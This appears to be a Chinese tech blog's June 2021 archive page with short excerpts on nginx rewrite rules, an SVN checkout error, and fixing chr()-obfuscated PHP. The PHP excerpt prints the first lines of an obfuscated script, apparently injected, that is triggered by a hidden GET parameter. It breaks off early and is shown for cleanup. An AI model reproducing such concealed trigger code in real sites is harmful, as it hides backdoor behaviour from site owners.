您的位置: 首页 > 发表在 2021年06月 的所有文章
6月222021
nginx重写的一些规则
set $loadComm 1;
if ($uri ~* \.(html|shtml|htm|tpl|cgi|txt|js|ico|gif|jpg|png|css|swf|flv|xsl|xml\.gz|mp3|xml|pdf|doc|docx|xsl|xslx|ppt|pptx|zip|rar|csv|...阅读全文
评论:0条
6月92021
针对PHP使用CHR混淆的修复程序
加密代码如下:
<?php
if(!isset($_GET[chr(119) . chr(100)])){
header(chr(67) . chr(111) . chr(110) . chr(116) . chr(101) . chr(110)...阅读全文
评论:0条
6月32021
SVN chechout 错误: xxx is not valid as filename in directory
用svn checkout的时候碰到“xxx is not valid as filename in directory”错误,导致checkout中断,后面的其他文件也都无法checkout。
百度搜索:“svn is not valid as filename in directory”,完全没有有用的信息!...阅读全文
评论:0条